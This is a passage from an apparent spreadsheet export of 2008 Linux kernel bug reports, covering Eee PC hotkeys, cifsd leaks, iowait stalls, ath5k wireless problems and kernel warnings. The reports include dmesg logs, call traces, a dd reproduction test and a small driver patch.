ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ed0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ee0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ef0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f20 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f30 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f40 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f50 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f60 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f70 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0f90 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0fa0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0fb0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0fc0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0fd0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0fe0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff</t>
  </si>
  <si>
    <t>Additional hotkeys EEEPC-1000H don't work</t>
  </si>
  <si>
    <t>2008-12-27 03:34 UTC</t>
  </si>
  <si>
    <t>Dominik Dresel</t>
  </si>
  <si>
    <t>2009-07-19 13:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: EEEPC-1000h Problem Description: If the module eeepc-laptop.ko is loaded, the hotkeys for WLAN, KEY_PROG1 (Taskmanager), sound mute, volume up, volume down and screen mode switching work as expected (the events get through to X, tested with xev). On the EEEPC-1000h there are 4 additional keys on the upper side of the keyboard (I don't know if the previous versions of the EEEPCs had such buttons) Anyway these buttons should work too, I created a patch for this to work. Also, I have modified the keytable to send the other events to X too (Sleep-Button, WLAN, Bluetooth) The patch was run againt the current 2.6.18 kernel release. Please approve and/or comment it. Steps to reproduce: Run xev in a X session, press the additional buttons on the EEEPC - no event will get through</t>
  </si>
  <si>
    <t>Runaways cifsd on after umount</t>
  </si>
  <si>
    <t>2008-12-27 04:23 UTC</t>
  </si>
  <si>
    <t>2009-01-10 04:43 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown (last kernel certain good 2.6.25.17) Earliest failing kernel version: unknown (first kernel certain bad 2.6.27.8) Distribution: Fedora Core 3 Problem Description: after mounting and umounting a remote cifs share, kernel cifsd remains alive and adds 1 to system load. Every new mount/umount leaves another cifsd, and increases system load by 1 more. Steps to reproduce: mount -t cifs \\remoteserver\share /mnt/cifs umount /mnt/cifs Attempted manual removal of cifsd kernel module: slab error in kmem_cache_destroy(): cache `cifs_small_rq': Can't free all objects Pid: 15146, comm: modprobe Tainted: G M 2.6.27.8 #3 Call Trace: [&lt;ffffffff8029f3c8&gt;] kmem_cache_destroy+0xc8/0x100 [&lt;ffffffffa02bc337&gt;] exit_cifs+0x2b/0x47 [cifs] [&lt;ffffffff8025e539&gt;] sys_delete_module+0x1c9/0x2a0 [&lt;ffffffff8028d22d&gt;] do_munmap+0x2cd/0x330 [&lt;ffffffff80349291&gt;] __up_write+0x21/0x140 [&lt;ffffffff8020b87b&gt;] system_call_fastpath+0x16/0x1b Kill -9 on cifsd threads has no result whatsoever. Although there seems no direct functional problem, a system load of &gt;&gt;50 is not exactly a good sign on an idle box...</t>
  </si>
  <si>
    <t>Large I/O operations result in poor interactive performance and high iowait times</t>
  </si>
  <si>
    <t>2008-12-27 06:56 UTC</t>
  </si>
  <si>
    <t>Ben Gamari</t>
  </si>
  <si>
    <t>2016-11-17 08:49 UTC</t>
  </si>
  <si>
    <t>This is an attempt at bringing sanity to bug #7372. Please only comment here is you are experiencing high I/O wait times and interactvity on reasonable workloads. Latest working kernel version: 2.6.18? Problem Description: I/O operations on large files tend to produce extremely high iowait times and poor system I/O performance (degraded interactivity). This behavior can be seen to varying degrees in tasks such as, - Backing up /home (40GB with numerous large files) with diffbackup to external USB hard drive - Moving messages between large maildirs - updatedb - Upgrading large numbers of packages with rpm Steps to reproduce: The best synthetic reproduction case I have found is, $ dd if=/dev/zero of=/tmp/test bs=1M count=1M During this copy, IO wait times are very high (70-80%) with extremely degraded interactivity although throughput averages about 29MB/s (about the disk's capacity I think). Even starting a new shell takes minutes, especially after letting the machine copy for a while without being actively used. Could this mean it's a caching issue?</t>
  </si>
  <si>
    <t>NOHZ appears to cause ondemand to effectively ignore 'ignore_nice_load'</t>
  </si>
  <si>
    <t>2008-12-27 19:38 UTC</t>
  </si>
  <si>
    <t>Jim Bray</t>
  </si>
  <si>
    <t>2009-02-13 15:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Don't think it ever worked well with NOHZ, but got worse after 2.6.26 Earliest failing kernel version: Distribution: Hardware Environment: Everex notebook, AMD 64 dual-core Software Environment: Problem Description: [this bug is a tickless+ondemand interaction: the problem may be in the cpufreq_ondemand code] I'm running boinc, which will cheerfully keep both cores loaded with niced processes if I let it. In the past, meaning for the last six months or more, I managed to stop the niced processes from upping the frequency by setting up_threshhold to 50 or more and letting boinc use only 80% CPU, but with 2.6.28 nothing I did mattered. I got to looking around the ondemand code and noticed that it would try to call get_cpu_idle_time_us() and then calculate idle time differently if that failed, which would happen if NOHZ is turned off. I rebooted with 'nohz=off' and the ondemand code behaves completely to spec according to how I set ignore_nice_load and up_threshhold. Steps to reproduce: Build tickless kernel, run boinc (or maybe a niced while-true loop?).</t>
  </si>
  <si>
    <t>Cannot list available channels on ath5k-based R52 with iw phy</t>
  </si>
  <si>
    <t>2.6.28-rc9-9238-gf2109d7</t>
  </si>
  <si>
    <t>2008-12-28 08:54 UTC</t>
  </si>
  <si>
    <t>Simon Farnsworth</t>
  </si>
  <si>
    <t>2009-05-11 15:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:N/A Earliest failing kernel version:N/A (not a regression) Distribution: Debian Lenny + self-compiled packages Hardware Environment: Intel Atom-based x86-64 motherboard, 2xMikrotik R52 ath5k-based WiFi cards Software Environment: libnl1 from Debian Lenny, iw from git, git describe gives v0.9.7-8-g917ce73 Problem Description: When I try to get a list of supported channels with iw, I get: # iw phy phy0 info command failed: No buffer space available (-105) (my ultimate goal is to get hostapd working, which is currently failing with: # hostapd -dd hostapd.wlan0 Configuration file: hostapd.wlan0 ctrl_interface_group=0 Opening raw packet socket for ifindex 651949248 BSS count 1, BSSID mask ff:ff:ff:ff:ff:ff (0 bits) SIOCGIWRANGE: WE(compiled)=22 WE(source)=21 enc_capa=0xf wlan0: IEEE 802.11 Fetching hardware channel/rate support not supported. Flushing old station entries Deauthenticate all stations Mode: IEEE 802.11a Channel: 36 Frequency: 0 MHz Could not set channel for kernel driver wlan0: Unable to setup interface. I have added support for AP mode with diff --git a/drivers/net/wireless/ath5k/base.c b/drivers/net/wireless/ath5k/base.c index 40c0155..1430a84 100644 --- a/drivers/net/wireless/ath5k/base.c +++ b/drivers/net/wireless/ath5k/base.c @@ -506,6 +506,7 @@ ath5k_pci_probe(struct pci_dev *pdev, hw-&gt;wiphy-&gt;interface_modes = BIT(NL80211_IFTYPE_STATION) | BIT(NL80211_IFTYPE_ADHOC) | + BIT(NL80211_IFTYPE_AP) | BIT(NL80211_IFTYPE_MESH_POINT); hw-&gt;extra_tx_headroom = 2; )</t>
  </si>
  <si>
    <t>Can't associate with AP using wep encryption</t>
  </si>
  <si>
    <t>2.6.27-9</t>
  </si>
  <si>
    <t>2008-12-28 09:08 UTC</t>
  </si>
  <si>
    <t>Vesa Vilhonen</t>
  </si>
  <si>
    <t>2009-06-16 17:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Not known Earliest failing kernel version: 2.6.27 not tested with any else Distribution: Ubuntu 8.10 32 Hardware Environment:acer aspire one ZG5, Atheros AR2425 Software Environment:version from http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2.6.tar.bz2 at 2008-12-28 Problem Description: Trying to associate with a network using wep encryption doesn't get anywhere and dmesg shows association timed out warnings. Steps to reproduce: Configure an AP to use WEP 128-bit encryption and try to associate with it. dmesg: [ 17.185073] ath5k 0000:03:00.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 17.185119] ath5k 0000:03:00.0: setting latency timer to 64 [ 17.185198] ath5k 0000:03:00.0: registered as 'phy0' [ 17.253765] ath5k phy0: (ath5k_attach:718): devid 0x1c [ 17.253794] ath5k phy0: (ath5k_desc_alloc:1265): DMA map: f7a2e000 (7744) -&gt; 37a2e000 [ 17.728682] ACPI: Battery Slot [BAT1] (battery present) [ 17.889058] phy0: Selected rate control algorithm 'pid' [ 18.749959] ACPI: WMI: Mapper loaded [ 19.499147] Synaptics Touchpad, model: 1, fw: 7.2, id: 0x1c0b1, caps: 0xd04771/0xa40000 [ 19.554123] input: SynPS/2 Synaptics TouchPad as /devices/platform/i8042/serio2/input/input7 [ 19.803534] input: Video Bus as /devices/LNXSYSTM:00/device:00/PNP0A08:00/device:19/input/input8 [ 19.832079] ACPI: Video Device [OVGA] (multi-head: yes rom: yes post: no) [ 19.883222] ath5k phy0: Atheros AR2425 chip found (MAC: 0xe2, PHY: 0x70) [ 20.507905] Linux video capture interface: v2.00 [ 20.553614] uvcvideo: Found UVC 1.00 device Acer Crystal Eye webcam (064e:d101) [ 20.558098] input: Acer Crystal Eye webcam as /devices/pci0000:00/0000:00:1d.7/usb1/1-5/1-5:1.0/input/input9 [ 20.585486] usbcore: registered new interface driver uvcvideo [ 20.585556] USB Video Class driver (v0.1.0) [ 20.636344] acer-wmi: Acer Laptop ACPI-WMI Extras [ 21.037719] HDA Intel 0000:00:1b.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 21.037757] HDA Intel 0000:00:1b.0: setting latency timer to 64 [ 21.074440] hda_codec: Unknown model for ALC268, trying auto-probe from BIOS... [ 24.148464] lp: driver loaded but no devices found [ 24.541389] Adding 2988048k swap on /dev/sda5. Priority:-1 extents:1 across:2988048k [ 24.699304] EXT3-fs warning: maximal mount count reached, running e2fsck is recommended [ 24.699801] EXT3 FS on sda1, internal journal [ 25.680631] type=1505 audit(1230483793.829:2): operation="profile_load" name="/usr/share/gdm/guest-session/Xsession" name2="default" pid=4021 [ 26.099414] type=1505 audit(1230483794.245:3): operation="profile_load" name="/usr/lib/cups/backend/cups-pdf" name2="default" pid=4026 [ 26.099890] type=1505 audit(1230483794.245:4): operation="profile_load" name="/usr/sbin/cupsd" name2="default" pid=4026 [ 26.223257] ip_tables: (C) 2000-2006 Netfilter Core Team [ 28.846523] warning: `avahi-daemon' uses 32-bit capabilities (legacy support in use) [ 28.953208] apm: BIOS not found. [ 29.245788] ppdev: user-space parallel port driver [ 32.201929] Bluetooth: Core ver 2.13 [ 32.204405] NET: Registered protocol family 31 [ 32.204426] Bluetooth: HCI device and connection manager initialized [ 32.204442] Bluetooth: HCI socket layer initialized [ 32.257875] Bluetooth: L2CAP ver 2.11 [ 32.257917] Bluetooth: L2CAP socket layer initialized [ 32.298566] Bluetooth: SCO (Voice Link) ver 0.6 [ 32.298593] Bluetooth: SCO socket layer initialized [ 32.347311] Bluetooth: BNEP (Ethernet Emulation) ver 1.3 [ 32.347328] Bluetooth: BNEP filters: protocol multicast [ 32.381734] Bluetooth: RFCOMM socket layer initialized [ 32.381770] Bluetooth: RFCOMM TTY layer initialized [ 32.381777] Bluetooth: RFCOMM ver 1.10 [ 32.414389] Bridge firewalling registered [ 32.417067] pan0: Dropping NETIF_F_UFO since no NETIF_F_HW_CSUM feature. [ 36.626218] r8169: eth0: link down [ 36.647664] ath5k phy0: (ath5k_init:2219): mode 2 [ 36.647689] ath5k phy0: (ath5k_stop_locked:2272): invalid 0 [ 36.647835] ath5k phy0: (ath5k_txq_cleanup:1479): beacon queue 0 [ 36.647975] ath5k phy0: (ath5k_txq_cleanup:1488): txq [0] fffbfeac, link 00000000 [ 36.648064] rx queue fff3ffec, link 00000000 [ 36.648076] ath5k phy0: (ath5k_reset:2687): resetting [ 36.674451] ath5k phy0: (ath5k_rx_start:1531): cachelsz 128 rxbufsize 2560 [ 36.696682] ath5k phy0: (ath5k_chan_set:1035): (2412 MHz) -&gt; (2412 MHz) [ 36.729055] ath5k phy0: (ath5k_chan_set:1035): (2412 MHz) -&gt; (2412 MHz) [ 36.756475] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 36.765105] ath5k phy0: (ath5k_intr:2379): status 0x400/0x800c14b5 [ 36.793312] rx queue 37a2e020, link f7a2e000 [ 36.888356] rx queue 37a2e060, link f7a2e040 [ 36.942478] NET: Registered protocol family 17 [ 36.981983] rx queue 37a2e0a0, link f7a2e080 [ 37.072327] rx queue 37a2e0e0, link f7a2e0c0 [ 37.160328] rx queue 37a2e140, link f7a2e120 [ 37.248331] rx queue 37a2e1c0, link f7a2e1a0 [ 37.324482] [drm] Initialized drm 1.1.0 20060810 [ 37.337298] pci 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 37.337322] pci 0000:00:02.0: setting latency timer to 64 [ 37.337351] rx queue 37a2e220, link f7a2e200 [ 37.337694] [drm] Initialized i915 1.6.0 20060119 on minor 0 [ 37.425354] rx queue 37a2e240, link f7a2e220 [ 37.513383] rx queue 37a2e280, link f7a2e260 [ 37.540374] mtrr: no more MTRRs available [ 37.601326] rx queue 37a2e2c0, link f7a2e2a0 [ 37.701397] rx queue 37a2e2e0, link f7a2e2c0 [ 37.817320] rx queue 37a2e300, link f7a2e2e0 [ 37.905319] rx queue 37a2e360, link f7a2e340 [ 37.992373] rx queue 37a2e3a0, link f7a2e380 [ 38.080351] rx queue 37a2e3e0, link f7a2e3c0 [ 38.168378] rx queue 37a2e440, link f7a2e420 [ 38.257339] rx queue 37a2e4e0, link f7a2e4c0 [ 38.345382] rx queue 37a2e0a0, link f7a2e080 [ 38.433372] rx queue 37a2e0c0, link f7a2e0a0 [ 38.521436] rx queue 37a2e140, link f7a2e120 [ 38.621310] rx queue 37a2e1a0, link f7a2e180 [ 38.713394] rx queue 37a2e1e0, link f7a2e1c0 [ 51.445552] __ratelimit: 208 callbacks suppressed [ 51.445581] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 51.446084] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 56.861387] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 57.038543] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 57.049118] ath5k phy0: (ath5k_chan_set:1035): (2412 MHz) -&gt; (2412 MHz) [ 57.084226] ath5k phy0: (ath5k_intr:2379): status 0x400/0x800c14b5 [ 57.084778] ath5k phy0: (ath5k_intr:2379): status 0x80/0x800c14b5 [ 57.113105] ath5k phy0: (ath5k_chan_set:1035): (2412 MHz) -&gt; (2417 MHz) [ 57.113141] ath5k phy0: (ath5k_reset:2687): resetting [ 57.113298] ath5k phy0: (ath5k_txq_cleanup:1479): beacon queue 0 [ 57.113449] ath5k phy0: (ath5k_txq_cleanup:1488): txq [0] 37a2e7c0, link 00000000 [ 57.113499] rx queue 37a2e260, link f7a2e240 [ 57.139928] ath5k phy0: (ath5k_rx_start:1531): cachelsz 128 rxbufsize 2560 [ 57.201398] rx queue 37a2e280, link f7a2e260 [ 57.309821] rx queue 37a2e2a0, link f7a2e280 [ 57.396305] rx queue 37a2e2c0, link f7a2e2a0 [ 57.484353] rx queue 37a2e360, link f7a2e340 [ 57.576864] rx queue 37a2e3e0, link f7a2e3c0 [ 57.668678] rx queue 37a2e420, link f7a2e400 [ 57.757415] rx queue 37a2e420, link f7a2e400 [ 57.850237] rx queue 37a2e440, link f7a2e420 [ 57.940395] rx queue 37a2e4a0, link f7a2e480 [ 58.028764] rx queue 37a2e4e0, link f7a2e4c0 [ 70.956064] __ratelimit: 93 callbacks suppressed [ 70.956089] ath5k phy0: (ath5k_chan_set:1035): (2412 MHz) -&gt; (2412 MHz) [ 70.969697] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 70.989197] ath5k phy0: (ath5k_intr:2379): status 0x400/0x800c14b5 [ 70.989797] ath5k phy0: (ath5k_intr:2379): status 0x80/0x800c14b5 [ 71.017087] ath5k phy0: (ath5k_chan_set:1035): (2412 MHz) -&gt; (2417 MHz) [ 71.017109] ath5k phy0: (ath5k_reset:2687): resetting [ 71.017259] ath5k phy0: (ath5k_txq_cleanup:1479): beacon queue 0 [ 71.017402] ath5k phy0: (ath5k_txq_cleanup:1488): txq [0] 37a2e920, link 00000000 [ 71.017441] rx queue 37a2e060, link f7a2e040 [ 71.043211] ath5k phy0: (ath5k_rx_start:1531): cachelsz 128 rxbufsize 2560 [ 71.046319] ath5k phy0: (ath5k_intr:2379): status 0x1/0x800c14b5 [ 71.105332] rx queue 37a2e080, link f7a2e060 [ 71.193345] rx queue 37a2e0a0, link f7a2e080 [ 71.281665] rx queue 37a2e0c0, link f7a2e0a0 [ 71.374180] rx queue 37a2e0c0, link f7a2e0a0 [ 71.465363] rx queue 37a2e100, link f7a2e0e0 [ 71.553360] rx queue 37a2e160, link f7a2e140 [ 71.641381] rx queue 37a2e160, link f7a2e140 [ 71.733357] rx queue 37a2e180, link f7a2e160 [ 71.821386] rx queue 37a2e1a0, link f7a2e180 [ 71.909653] rx queue 37a2e1a0, link f7a2e180 [ 71.913657] rx queue 0, link 00000000 [ 71.941215] rx queue 37a2e1a0, link f7a2e180 [ 71.969143] wlan0: authenticate with AP 00:1b:11:9b:8f:d8 [ 72.169068] wlan0: authenticate with AP 00:1b:11:9b:8f:d8 [ 72.369128] wlan0: authenticate with AP 00:1b:11:9b:8f:d8 [ 72.569076] wlan0: authentication with AP 00:1b:11:9b:8f:d8 timed out</t>
  </si>
  <si>
    <t>[TRIVIAL] MTRR cleanup WARN message (arch/x86/kernel/cpu/mtrr/generic.c:404)</t>
  </si>
  <si>
    <t>2008-12-28 09:19 UTC</t>
  </si>
  <si>
    <t>Eugene Grygoriev</t>
  </si>
  <si>
    <t>2012-05-24 13:38 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Distribution: debian Hardware Environment: MSI laptop (M673) Software Environment: 32-bit kernel and userspace Problem Description: I've just built this kernel and got followed warning: [ 0.000000] ------------[ cut here ]------------ [ 0.000000] WARNING: at arch/x86/kernel/cpu/mtrr/generic.c:404 generic_get_mtrr+0xea/0x120() [ 0.000000] mtrr: your BIOS has set up an incorrect mask, fixing it up. [ 0.000000] Modules linked in: [ 0.000000] Pid: 0, comm: swapper Not tainted 2.6.28 #1 [ 0.000000] Call Trace: [ 0.000000] [&lt;c012a87f&gt;] warn_slowpath+0x6f/0x90 [ 0.000000] [&lt;c0373031&gt;] fn_hash_delete+0x91/0x260 [ 0.000000] [&lt;c0258724&gt;] number+0x2b4/0x2c0 [ 0.000000] [&lt;c0259353&gt;] vsnprintf+0x393/0x670 [ 0.000000] [&lt;c0143fd1&gt;] up+0x11/0x40 [ 0.000000] [&lt;c012b079&gt;] release_console_sem+0x189/0x1d0 [ 0.000000] [&lt;c01109da&gt;] generic_get_mtrr+0xea/0x120 [ 0.000000] [&lt;c04d98cf&gt;] mtrr_trim_uncached_memory+0x7d/0x374 [ 0.000000] [&lt;c03a2c6a&gt;] printk+0x17/0x1b [ 0.000000] [&lt;c011ddbc&gt;] pat_init+0x7c/0xa0 [ 0.000000] [&lt;c0110eac&gt;] post_set+0x1c/0x50 [ 0.000000] [&lt;c03a2c6a&gt;] printk+0x17/0x1b [ 0.000000] [&lt;c04d5d22&gt;] e820_end_pfn+0xb5/0xd3 [ 0.000000] [&lt;c04d41de&gt;] setup_arch+0x516/0x808 [ 0.000000] [&lt;c04d6e97&gt;] reserve_early_overlap_ok+0x3f/0x47 [ 0.000000] [&lt;c04cd5dc&gt;] start_kernel+0x58/0x334 [ 0.000000] ---[ end trace 4eaa2a86a8e2da22 ]--- This warning message was introduced by followed commit (emails cc-ed): commit 16dc552f35bc0ec6fec8ef83f8032eee352d17f5 Author: Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Date: Fri Sep 19 11:45:04 2008 -0700 x86: use WARN_ONCE in workaround for mtrr mask so could help catch attention about bug in bios about mtrr mask setting. WARN_ONCE got into mainline already, lets use it. Signed-off-by: Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; 2.6.27 shows only printk message about this. Since previous kernels (&lt;=2.6.25) even don't warns about this, is it so important to warn so loud about this and mark kernel as tainted? Should I do something? (Laptop is old enough so please don't ask me to contact MSI for fixed BIOS). all kernels since 2.6.23 works without any problems here.</t>
  </si>
  <si>
    <t>warn_on_slowpath when playing audio CD</t>
  </si>
  <si>
    <t>2008-12-28 22:31 UTC</t>
  </si>
  <si>
    <t>2009-01-25 01:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: Clevo D410J + Optiarc DVD RW AD-7543A Software Environment: Debian Problem Description: The following warning appears in dmesg with Linux 2.6.28 when playing an audio CD with kaffeine 0.8.7. The warning message repeats until the audio playback is not stopped. [ 623.491756] ------------[ cut here ]------------ [ 623.491770] WARNING: at arch/x86/kernel/pci-nommu.c:62 nommu_map_sg+0x22/0xb0() [ 623.491776] Modules linked in: ppdev lp cpufreq_ondemand cpufreq_conservative ipv6 xt_tcpudp iptable_filter ip_tables x_tables l eds_clevo_mail led_class via via_agp drm agpgart eeprom snd_pcm_oss snd_mixer_oss cpufreq_userspace cpufreq_powersave powernow_k8 f an snd_via82xx snd_mpu401_uart snd_seq_midi snd_seq_midi_event mousedev snd_via82xx_modem snd_ac97_codec ac97_bus snd_rawmidi snd_p cm snd_seq snd_timer snd_seq_device pcmcia firmware_class i2c_viapro snd ehci_hcd pcspkr uhci_hcd k8temp hwmon psmouse serio_raw 81 39too mii snd_page_alloc soundcore ide_cd_mod cdrom i2c_core usbcore bitrev crc32 yenta_socket rsrc_nonstatic pcmcia_core 8250_pnp 8250 video backlight output serial_core parport_pc parport battery ac thermal button processor evdev [ 623.491932] Pid: 4418, comm: kaffeine Not tainted 2.6.28 #1 [ 623.491939] Call Trace: [ 623.491952] [&lt;c0338dcf&gt;] ? printk+0x18/0x21 [ 623.491962] [&lt;c0123664&gt;] warn_on_slowpath+0x54/0x80 [ 623.491976] [&lt;c01ab0b5&gt;] ? __find_get_block_slow+0x75/0x130 [ 623.491985] [&lt;c0107d42&gt;] nommu_map_sg+0x22/0xb0 [ 623.491995] [&lt;c02b378a&gt;] ide_build_sglist+0x4a/0x60 [ 623.492004] [&lt;c02b3ae6&gt;] ide_build_dmatable+0x36/0x1a0 [ 623.492012] [&lt;c02b3c8c&gt;] ide_dma_setup+0x3c/0x100 [ 623.492017] [&lt;f819bb30&gt;] ? cdrom_do_newpc_cont+0x0/0x20 [ide_cd_mod] [ 623.492017] [&lt;f819b0a3&gt;] ide_cd_do_request+0x473/0x8b0 [ide_cd_mod] [ 623.492017] [&lt;c023fb6c&gt;] ? delay_tsc+0x6c/0xb4 [ 623.492017] [&lt;c023fabb&gt;] ? __const_udelay+0x1b/0x20 [ 623.492017] [&lt;c02abe92&gt;] ? __ide_wait_stat+0x52/0x120 [ 623.492017] [&lt;c02ac7cf&gt;] ? ide_wait_stat+0x3f/0x90 [ 623.492017] [&lt;c02aa01c&gt;] ide_do_request+0x48c/0xab0 [ 623.492017] [&lt;c033bf8d&gt;] ? _spin_lock_irqsave+0x4d/0x60 [ 623.492017] [&lt;c0144c0b&gt;] ? trace_hardirqs_off+0xb/0x10 [ 623.492017] [&lt;c033bc99&gt;] ? _spin_unlock_irqrestore+0x39/0x70 [ 623.492017] [&lt;c012cb46&gt;] ? del_timer+0x66/0x80 [ 623.492017] [&lt;c02aa849&gt;] do_ide_request+0x19/0x20 [ 623.492017] [&lt;c022f848&gt;] blk_start_queueing+0x18/0x40 [ 623.492017] [&lt;c022d6e4&gt;] elv_insert+0x114/0x1e0 [ 623.492017] [&lt;c012cd97&gt;] ? mod_timer+0x37/0x80 [ 623.492017] [&lt;c022d821&gt;] __elv_add_request+0x71/0xc0 [ 623.492017] [&lt;c02321f5&gt;] blk_execute_rq_nowait+0x55/0xa0 [ 623.492017] [&lt;c02322b0&gt;] blk_execute_rq+0x70/0xc0 [ 623.492017] [&lt;c0232170&gt;] ? blk_end_sync_rq+0x0/0x30 [ 623.492017] [&lt;c0146366&gt;] ? trace_hardirqs_on_caller+0xf6/0x140 [ 623.492017] [&lt;c02378c0&gt;] ? cfq_set_request+0x0/0x330 [ 623.492017] [&lt;c022c88f&gt;] ? elv_set_request+0x1f/0x50 [ 623.492017] [&lt;c022f38c&gt;] ? get_request+0x25c/0x290 [ 623.492017] [&lt;c022f91d&gt;] ? get_request_wait+0x1d/0x100 [ 623.492017] [&lt;f819c488&gt;] ide_cd_queue_pc+0xb8/0x1b0 [ide_cd_mod] [ 623.492017] [&lt;c0144c0b&gt;] ? trace_hardirqs_off+0xb/0x10 [ 623.492017] [&lt;c033bc99&gt;] ? _spin_unlock_irqrestore+0x39/0x70 [ 623.492017] [&lt;c02aa849&gt;] ? do_ide_request+0x19/0x20 [ 623.492017] [&lt;f819d46e&gt;] ide_cdrom_packet+0x8e/0xc0 [ide_cd_mod] [ 623.492017] [&lt;f818f3b3&gt;] cdrom_read_block+0xa3/0xd0 [cdrom] [ 623.492017] [&lt;f8192283&gt;] mmc_ioctl+0x1633/0x19b0 [cdrom] [ 623.492017] [&lt;c01461a1&gt;] ? mark_held_locks+0x41/0x80 [ 623.492017] [&lt;c033bc32&gt;] ? _spin_unlock_irq+0x22/0x50 [ 623.492017] [&lt;c01462df&gt;] ? trace_hardirqs_on_caller+0x6f/0x140 [ 623.492017] [&lt;c01463bb&gt;] ? trace_hardirqs_on+0xb/0x10 [ 623.492017] [&lt;c033bc3d&gt;] ? _spin_unlock_irq+0x2d/0x50 [ 623.492017] [&lt;c012c2cf&gt;] ? run_timer_softirq+0x15f/0x1e0 [ 623.492017] [&lt;c013b780&gt;] ? hrtimer_interrupt+0x160/0x190 [ 623.492017] [&lt;c023a402&gt;] ? kobject_get+0x12/0x20 [ 623.492017] [&lt;c022f51d&gt;] ? blk_put_queue+0xd/0x10 [ 623.492017] [&lt;c0235b13&gt;] ? scsi_cmd_ioctl+0xa3/0x4d0 [ 623.492017] [&lt;c02a8eac&gt;] ? generic_ide_ioctl+0x2c/0x5d0 [ 623.492017] [&lt;f819267a&gt;] cdrom_ioctl+0x7a/0xe20 [cdrom] [ 623.492017] [&lt;c016852b&gt;] ? __rmqueue+0x1b/0x1f0 [ 623.492017] [&lt;f819a6b4&gt;] idecd_ioctl+0x104/0x180 [ide_cd_mod] [ 623.492017] [&lt;c0164590&gt;] ? find_get_page+0x0/0xd0 [ 623.492017] [&lt;c01649b3&gt;] ? find_lock_page+0x33/0x80 [ 623.492017] [&lt;c0233350&gt;] __blkdev_driver_ioctl+0x70/0x80 [ 623.492017] [&lt;c023341f&gt;] blkdev_ioctl+0x8f/0xa90 [ 623.492017] [&lt;c0164970&gt;] ? unlock_page+0x40/0x50 [ 623.492017] [&lt;c0173a53&gt;] ? __do_fault+0x1d3/0x3c0 [ 623.492017] [&lt;c0175101&gt;] ? handle_mm_fault+0x101/0x610 [ 623.492017] [&lt;c033e411&gt;] ? do_page_fault+0xf1/0x840 [ 623.492017] [&lt;c013baa6&gt;] ? up_read+0x16/0x30 [ 623.492017] [&lt;c033e59a&gt;] ? do_page_fault+0x27a/0x840 [ 623.492017] [&lt;c0146db7&gt;] ? __lock_acquire+0x147/0x1600 [ 623.492017] [&lt;c01b056b&gt;] block_ioctl+0x3b/0x50 [ 623.492017] [&lt;c01b0530&gt;] ? block_ioctl+0x0/0x50 [ 623.492017] [&lt;c0198568&gt;] vfs_ioctl+0x28/0x80 [ 623.492017] [&lt;c019871e&gt;] do_vfs_ioctl+0x5e/0x4b0 [ 623.492017] [&lt;c018cd92&gt;] ? fget_light+0x112/0x140 [ 623.492017] [&lt;c018cccd&gt;] ? fget_light+0x4d/0x140 [ 623.492017] [&lt;c0198ba9&gt;] sys_ioctl+0x39/0x70 [ 623.492017] [&lt;c01033d9&gt;] sysenter_do_call+0x12/0x31 [ 623.492017] ---[ end trace 2ca35fe06a780316 ]--- Steps to reproduce: 1. Boot Linux 2.6.28 on Clevo D410J laptop 2. Insert an audio CD 3. start playing it with kaffeine 0.8.7</t>
  </si>
  <si>
    <t>Intermittent TCP issues with =&gt; 2.6.27</t>
  </si>
  <si>
    <t>2008-12-29 18:52 UTC</t>
  </si>
  <si>
    <t>Dean Holland</t>
  </si>
  <si>
    <t>2012-05-24 13:43 UTC</t>
  </si>
  <si>
